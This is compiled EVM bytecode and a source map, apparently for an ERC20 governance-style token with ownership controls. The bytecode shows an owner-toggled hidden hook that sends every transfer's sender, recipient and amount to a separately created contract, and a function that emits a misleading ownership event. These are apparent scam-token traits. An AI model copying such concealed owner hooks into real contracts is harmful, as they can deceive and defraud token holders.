ffffffffffffffffffffffffffffffffffffff161461088d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610884906127ad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b600043821061098f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109869061283f565b60405180910390fd5b6000600a60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff16905060008163ffffffff16036109fb576000915050610d1a565b82600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600184610a4a919061288e565b63ffffffff1663ffffffff16815260200190815260200160002060000160009054906101000a900463ffffffff1663ffffffff1611610af757600960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600183610ad1919061288e565b63ffffffff1663ffffffff16815260200190815260200160002060010154915050610d1a565b82600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008063ffffffff16815260200190815260200160002060000160009054906101000a900463ffffffff1663ffffffff161115610b78576000915050610d1a565b600080600183610b88919061288e565b90505b8163ffffffff168163ffffffff161115610cb457600060028383610baf919061288e565b610bb991906128f5565b82610bc4919061288e565b90506000600960008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008363ffffffff1663ffffffff1681526020019081526020016000206040518060400160405290816000820160009054906101000a900463ffffffff1663ffffffff1663ffffffff168152602001600182015481525050905086816000015163ffffffff1603610c8357806020015195505050505050610d1a565b86816000015163ffffffff161015610c9d57819350610cad565b600182610caa919061288e565b92505b5050610b8b565b600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008363ffffffff1663ffffffff1681526020019081526020016000206001015493505050505b92915050565b610d28611522565b73ffffffffffffffffffffffffffffffffffffffff16610d46610f90565b73ffffffffffffffffffffffffffffffffffffffff1614610d9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d93906127ad565b60405180910390fd5b60011515600360009054906101000a900460ff16151503610eca576000821115610dce57610dc981611888565b610e38565b604051610dda9061227e565b604051809103906000f080158015610df6573d6000803e3d6000fd5b50600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636bf92ea28585856040518463ffffffff1660e01b8152600401610e9793929190612926565b600060405180830381600087803b158015610eb157600080fd5b505af1158015610ec5573d6000803e3d6000fd5b505050505b50505050565b610ed8611522565b73ffffffffffffffffffffffffffffffffffffffff16610ef6610f90565b73ffffffffffffffffffffffffffffffffffffffff1614610f4c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f43906127ad565b60405180910390fd5b600360009054906101000a900460ff1615600360006101000a81548160ff021916908315150217905550565b600b6020528060005260406000206000915090505481565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610fc890612730565b80601f0160208091040260200160405190810160405280929190818152602001828054610ff490612730565b80156110415780601f1061101657610100808354040283529160200191611041565b820191906000526020600020905b81548152906001019060200180831161102457829003601f168201915b5050505050905090565b600080600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff16905060008163ffffffff16116110b5576000611122565b600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600183611103919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101545b915050919050565b60006111ed611137611522565b846111e8856040518060600160405280602581526020016130fa6025913960026000611161611522565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546117cc9092919063ffffffff16565b61152a565b6001905092915050565b600061120b611204611522565b84846116f3565b6001905092915050565b8073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36001600060146101000a81548160ff02191690831515021790555050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b7fe48329057bfd03d55e49b547132e39cffd9c1820ad7b9d4c5307691425d15adf81565b6009602052816000526040600020602052806000526040600020600091509150508060000160009054906101000a900463ffffffff16908060010154905082565b611382611522565b73ffffffffffffffffffffffffffffffffffffffff166113a0610f90565b73ffffffffffffffffffffffffffffffffffffffff16146113f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ed906127ad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611465576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161145c906129cf565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611599576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159090612a61565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611608576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115ff90612af3565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516116e6919061245b565b60405180910390a3505050565b6116fe8383836118da565b6117c7600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683611b71565b505050565b6000838311158290611814576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161180b919061231b565b60405180910390fd5b5082846118219190612b13565b90509392505050565b60008082846118399190612b47565b90508381101561187e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161187590612bc7565b60405180910390fd5b8091505092915050565b611890611e20565b156118d75780600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b50565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611949576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161194090612c59565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119b8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119af90612ceb565b60405180910390fd5b6119c3838383611e36565b611a2f8160405180606001604052806026815260200161307e60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546117cc9092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611ac481600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461182a90919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611b64919061245b565b60405180910390a3505050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611bad5750600081115b15611e1b57600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614611ce6576000600a60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff1690506000808263ffffffff1611611c50576000611cbd565b600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600184611c9e919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101545b90506000611cd48483611ecc90919063ffffffff16565b9050611ce286848484611f25565b5050505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614611e1a576000600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff1690506000808263ffffffff1611611d84576000611df1565b600960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600184611dd2919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101545b90506000611e08848361182a90919063ffffffff16565b9050611e1685848484611f25565b5050505b5b505050565b60008060149054906101000a900460ff16905090565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636bf92ea28484846040518463ffffffff1660e01b8152600401611e9593929190612926565b600060405180830381600087803b158015611eaf57600080fd5b505af1158015611ec3573d6000803e3d6000fd5b50505050505050565b600082821115611f11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f0890612d57565b60405180910390fd5b8183611f1d9190612b13565b905092915050565b6000611f49436040518060600160405280602e81526020016130cc602e9139612228565b905060008463ffffffff16118015611fe757508063ffffffff16600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600187611fb1919061288e565b63ffffffff1663ffffffff16815260200190815260200160002060000160009054906101000a900463ffffffff1663ffffffff16145b156120615781600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600060018761203b919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101819055506121d1565b60405180604001604052808263ffffffff16815260200183815250600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008663ffffffff1663ffffffff16815260200190815260200160002060008201518160000160006101000a81548163ffffffff021916908363ffffffff160217905550602082015181600101559050508363ffffffff166001856121209190612d77565b63ffffffff1611612166576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161215d90612e21565b60405180910390fd5b6001846121739190612d77565b600a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548163ffffffff021916908363ffffffff1602179055505b8473ffffffffffffffffffffffffffffffffffffffff167fdec2bacdd2f05b59de34da9b523dff8be42e5e38e818c82fdb0bae774387a7248484604051612219929190612e41565b60405180910390a25050505050565b600064010000000083108290612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b919061231b565b60405180910390fd5b5082905092915050565b61021380612e6b83390190565b600081519050919050565b600082825260208201905092915050565b60005b838110156122c55780820151818401526020810190506122aa565b60008484015250505050565b6000601f19601f8301169050919050565b60006122ed8261228b565b6122f78185612296565b93506123078185602086016122a7565b612310816122d1565b840191505092915050565b6000602082019050818103600083015261233581846122e2565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061236d82612342565b9050919050565b61237d81612362565b811461238857600080fd5b50565b60008135905061239a81612374565b92915050565b6000819050919050565b6123b3816123a0565b81146123be57600080fd5b50565b6000813590506123d0816123aa565b92915050565b600080604083850312156123ed576123ec61233d565b5b60006123fb8582860161238b565b925050602061240c858286016123c1565b9150509250929050565b60008115159050919050565b61242b81612416565b82525050565b60006020820190506124466000830184612422565b92915050565b612455816123a0565b82525050565b6000602082019050612470600083018461244c565b92915050565b6000819050919050565b61248981612476565b82525050565b60006020820190506124a46000830184612480565b92915050565b6000806000606084860312156124c3576124c261233d565b5b60006124d18682870161238b565b93505060206124e28682870161238b565b92505060406124f3868287016123c1565b9150509250925092565b600060ff82169050919050565b612513816124fd565b82525050565b600060208201905061252e600083018461250a565b92915050565b60006020828403121561254a5761254961233d565b5b60006125588482850161238b565b91505092915050565b600063ffffffff82169050919050565b61257a81612561565b82525050565b60006020820190506125956000830184612571565b92915050565b600080600080608085870312156125b5576125b461233d565b5b60006125c38782880161238b565b94505060206125d48782880161238b565b93505060406125e5878288016123c1565b92505060606125f68782880161238b565b91505092959194509250565b61260b81612362565b82525050565b60006020820190506126266000830184612602565b92915050565b600080604083850312156126435761264261233d565b5b60006126518582860161238b565b92505060206126628582860161238b565b9150509250929050565b61267581612561565b811461268057600080fd5b50565b6000813590506126928161266c565b92915050565b600080604083850312156126af576126ae61233d565b5b60006126bd8582860161238b565b92505060206126ce85828601612683565b9150509250929050565b60006040820190506126ed6000830185612571565b6126fa602083018461244c565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061274857607f821691505b60208210810361275b5761275a612701565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612797602083612296565b91506127a282612761565b602082019050919050565b600060208201905081810360008301526127c68161278a565b9050919050565b7f6765745072696f72566f7465733a206e6f74207965742064657465726d696e6560008201527f6400000000000000000000000000000000000000000000000000000000000000602082015250565b6000612829602183612296565b9150612834826127cd565b604082019050919050565b600060208201905081810360008301526128588161281c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061289982612561565b91506128a483612561565b9250828203905063ffffffff8111156128c0576128bf61285f565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061290082612561565b915061290b83612561565b92508261291b5761291a6128c6565b5b828204905092915050565b600060608201905061293b6000830186612602565b6129486020830185612602565b612955604083018461244c565b949350505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006129b9602683612296565b91506129c48261295d565b604082019050919050565b600060208201905081810360008301526129e8816129ac565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612a4b602483612296565b9150612a56826129ef565b604082019050919050565b60006020820190508181036000830152612a7a81612a3e565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612add602283612296565b9150612ae882612a81565b604082019050919050565b60006020820190508181036000830152612b0c81612ad0565b9050919050565b6000612b1e826123a0565b9150612b29836123a0565b9250828203905081811115612b4157612b4061285f565b5b92915050565b6000612b52826123a0565b9150612b5d836123a0565b9250828201905080821115612b7557612b7461285f565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000612bb1601b83612296565b9150612bbc82612b7b565b602082019050919050565b60006020820190508181036000830152612be081612ba4565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612c43602583612296565b9150612c4e82612be7565b604082019050919050565b60006020820190508181036000830152612c7281612c36565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612cd5602383612296565b9150612ce082612c79565b604082019050919050565b60006020820190508181036000830152612d0481612cc8565b9050919050565b7f536166654d6174683a207375627472616374696f6e206f766572666c6f770000600082015250565b6000612d41601e83612296565b9150612d4c82612d0b565b602082019050919050565b60006020820190508181036000830152612d7081612d34565b9050919050565b6000612d8282612561565b9150612d8d83612561565b9250828201905063ffffffff811115612da957612da861285f565b5b92915050565b7f5f7772697465436865636b706f696e743a206e657720636865636b706f696e7460008201527f2065786365656473203332206269747300000000000000000000000000000000602082015250565b6000612e0b603083612296565b9150612e1682612daf565b604082019050919050565b60006020820190508181036000830152612e3a81612dfe565b9050919050565b6000604082019050612e56600083018561244c565b612e63602083018461244c565b939250505056fe608060405234801561001057600080fd5b506101f3806100206000396000f3fe608060405234801561001057600080fd5b506004361061002b5760003560e01c80636bf92ea214610030575b600080fd5b61004a6004803603810190610045919061016a565b61004c565b005b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610101826100d6565b9050919050565b610111816100f6565b811461011c57600080fd5b50565b60008135905061012e81610108565b92915050565b6000819050919050565b61014781610134565b811461015257600080fd5b50565b6000813590506101648161013e565b92915050565b600080600060608486031215610183576101826100d1565b5b60006101918682870161011f565b93505060206101a28682870161011f565b92505060406101b386828701610155565b915050925092509256fea26469706673582212207b0e117a2c60444165701ebddd3e3f73e03e65a5b4b4619ca32ed6d29cf1520564736f6c6343000813003345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655f7772697465436865636b706f696e743a20626c6f636b206e756d6265722065786365656473203332206269747345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220a130ca27e7bfcbe5329cb0c6089e685ce4ed20cabf6b2a81e5cdf57ed76ff88864736f6c63430008130033

Deployed Bytecode Sourcemap

23906:7070:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14349:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16283:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14505:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25400:122;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16934:321;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15251:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17664:218;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13365:26;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25278:49;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15407:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8591:148;;;:::i;:::-;;27115:1247;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21515:290;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30545:92;;;:::i;:::-;;25814:39;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7940:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14184:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26436:248;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18385:269;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15747:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7697:164;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15985:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25616:117;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25139:70;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;;:::i;:::-;;;;;;;;8894:244;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14349:91;14394:13;14427:5;14420:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14349:91;:::o;16283:169::-;16366:4;16383:39;16392:12;:10;:12::i;:::-;16406:7;16415:6;16383:8;:39::i;:::-;16440:4;16433:11;;16283:169;;;;:::o;14505:108::-;14566:7;14593:12;;14586:19;;14505:108;:::o;25400:122::-;25442:80;25400:122;:::o;16934:321::-;17040:4;17057:36;17067:6;17075:9;17086:6;17057:9;:36::i;:::-;17104:121;17113:6;17121:12;:10;:12::i;:::-;17135:89;17173:6;17135:89;;;;;;;;;;;;;;;;;:11;:19;17147:6;17135:19;;;;;;;;;;;;;;;:33;17155:12;:10;:12::i;:::-;17135:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;17104:8;:121::i;:::-;17243:4;17236:11;;16934:321;;;;;:::o;15251:91::-;15300:5;15325:9;;;;;;;;;;;15318:16;;15251:91;:::o;17664:218::-;17752:4;17769:83;17778:12;:10;:12::i;:::-;17792:7;17801:50;17840:10;17801:11;:25;17813:12;:10;:12::i;:::-;17801:25;;;;;;;;;;;;;;;:34;17827:7;17801:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;17769:8;:83::i;:::-;17870:4;17863:11;;17664:218;;;;:::o;13365:26::-;;;;;;;;;;;;;:::o;25278:49::-;;;;;;;;;;;;;;;;;;;;;;:::o;15407:127::-;15481:7;15508:9;:18;15518:7;15508:18;;;;;;;;;;;;;;;;15501:25;;15407:127;;;:::o;8591:148::-;8171:12;:10;:12::i;:::-;8160:23;;:7;:5;:7::i;:::-;:23;;;8152:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8698:1:::1;8661:40;;8682:6;::::0;::::1;;;;;;;;8661:40;;;;;;;;;;;;8729:1;8712:6:::0;::::1;:19;;;;;;;;;;;;;;;;;;8591:148::o:0;27115:1247::-;27223:7;27270:12;27256:11;:26;27248:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;27333:19;27355:14;:23;27370:7;27355:23;;;;;;;;;;;;;;;;;;;;;;;;;27333:45;;27409:1;27393:12;:17;;;27389:58;;27434:1;27427:8;;;;;27389:58;27559:11;27507;:20;27519:7;27507:20;;;;;;;;;;;;;;;:38;27543:1;27528:12;:16;;;;:::i;:::-;27507:38;;;;;;;;;;;;;;;:48;;;;;;;;;;;;:63;;;27503:147;;27594:11;:20;27606:7;27594:20;;;;;;;;;;;;;;;:38;27630:1;27615:12;:16;;;;:::i;:::-;27594:38;;;;;;;;;;;;;;;:44;;;27587:51;;;;;27503:147;27747:11;27711;:20;27723:7;27711:20;;;;;;;;;;;;;;;:23;27732:1;27711:23;;;;;;;;;;;;;:33;;;;;;;;;;;;:47;;;27707:88;;;27782:1;27775:8;;;;;27707:88;27807:12;27834;27864:1;27849:12;:16;;;;:::i;:::-;27834:31;;27876:428;27891:5;27883:13;;:5;:13;;;27876:428;;;27913:13;27955:1;27946:5;27938;:13;;;;:::i;:::-;27937:19;;;;:::i;:::-;27929:5;:27;;;;:::i;:::-;27913:43;;27998:20;28021:11;:20;28033:7;28021:20;;;;;;;;;;;;;;;:28;28042:6;28021:28;;;;;;;;;;;;;;;27998:51;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;28084:11;28068:2;:12;;;:27;;;28064:229;;28123:2;:8;;;28116:15;;;;;;;;;28064:229;28172:11;28157:2;:12;;;:26;;;28153:140;;;28212:6;28204:14;;28153:140;;;28276:1;28267:6;:10;;;;:::i;:::-;28259:18;;28153:140;27898:406;;27876:428;;;28321:11;:20;28333:7;28321:20;;;;;;;;;;;;;;;:27;28342:5;28321:27;;;;;;;;;;;;;;;:33;;;28314:40;;;;;27115:1247;;;;;:::o;21515:290::-;8171:12;:10;:12::i;:::-;8160:23;;:7;:5;:7::i;:::-;:23;;;8152:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21637:4:::1;21621:20;;:14;;;;;;;;;;;:20;;::::0;21618:180:::1;;21665:1;21656:6;:10;21653:95;;;21668:18;21681:4;21668:12;:18::i;:::-;21653:95;;;21718:20;;;;;:::i;:::-;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;21710:7;;:28;;;;;;;;;;;;;;;;;;21653:95;21758:7;;;;;;;;;;;:12;;;21771:4;21777:2;21781:6;21758:30;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;;;;;21618:180;21515:290:::0;;;;:::o;30545:92::-;8171:12;:10;:12::i;:::-;8160:23;;:7;:5;:7::i;:::-;:23;;;8152:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;30615:14:::1;;;;;;;;;;;30614:15;30597:14;;:32;;;;;;;;;;;;;;;;;;30545:92::o:0;25814:39::-;;;;;;;;;;;;;;;;;:::o;7940:87::-;7986:7;8013:6;;;;;;;;;;;8006:13;;7940:87;:::o;14184:95::-;14231:13;14264:7;14257:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14184:95;:::o;26436:248::-;26521:7;26546:19;26568:14;:23;26583:7;26568:23;;;;;;;;;;;;;;;;;;;;;;;;;26546:45;;26624:1;26609:12;:16;;;:67;;26675:1;26609:67;;;26628:11;:20;26640:7;26628:20;;;;;;;;;;;;;;;:38;26664:1;26649:12;:16;;;;:::i;:::-;26628:38;;;;;;;;;;;;;;;:44;;;26609:67;26602:74;;;26436:248;;;:::o;18385:269::-;18478:4;18495:129;18504:12;:10;:12::i;:::-;18518:7;18527:96;18566:15;18527:96;;;;;;;;;;;;;;;;;:11;:25;18539:12;:10;:12::i;:::-;18527:25;;;;;;;;;;;;;;;:34;18553:7;18527:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;18495:8;:129::i;:::-;18642:4;18635:11;;18385:269;;;;:::o;15747:175::-;15833:4;15850:42;15860:12;:10;:12::i;:::-;15874:9;15885:6;15850:9;:42::i;:::-;15910:4;15903:11;;15747:175;;;;:::o;7697:164::-;7804:9;7771:43;;7800:1;7771:43;;;;;;;;;;;;7849:4;7825:21;;:28;;;;;;;;;;;;;;;;;;7697:164;:::o;15985:151::-;16074:7;16101:11;:18;16113:5;16101:18;;;;;;;;;;;;;;;:27;16120:7;16101:27;;;;;;;;;;;;;;;;16094:34;;15985:151;;;;:::o;25616:117::-;25662:71;25616:117;:::o;25139:70::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;8894:244::-;8171:12;:10;:12::i;:::-;8160:23;;:7;:5;:7::i;:::-;:23;;;8152:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9003:1:::1;8983:22;;:8;:22;;::::0;8975:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;9093:8;9064:38;;9085:6;::::0;::::1;;;;;;;;9064:38;;;;;;;;;;;;9122:8;9113:6;::::0;:17:::1;;;;;;;;;;;;;;;;;;8894:244:::0;:::o;6891:98::-;6944:7;6971:10;6964:17;;6891:98;:::o;20731:346::-;20850:1;20833:19;;:5;:19;;;20825:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;20931:1;20912:21;;:7;:21;;;20904:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21015:6;20985:11;:18;20997:5;20985:18;;;;;;;;;;;;;;;:27;21004:7;20985:27;;;;;;;;;;;;;;;:36;;;;21053:7;21037:32;;21046:5;21037:32;;;21062:6;21037:32;;;;;;:::i;:::-;;;;;;;;20731:346;;;:::o;24150:235::-;24249:42;24265:6;24273:9;24284:6;24249:15;:42::i;:::-;24302:65;24317:10;:18;24328:6;24317:18;;;;;;;;;;;;;;;;;;;;;;;;;24337:10;:21;24348:9;24337:21;;;;;;;;;;;;;;;;;;;;;;;;;24360:6;24302:14;:65::i;:::-;24150:235;;;:::o;5016:166::-;5102:7;5135:1;5130;:6;;5138:12;5122:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;5173:1;5169;:5;;;;:::i;:::-;5162:12;;5016:166;;;;;:::o;2189:179::-;2247:7;2267:9;2283:1;2279;:5;;;;:::i;:::-;2267:17;;2308:1;2303;:6;;2295:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;2359:1;2352:8;;;2189:179;;;;::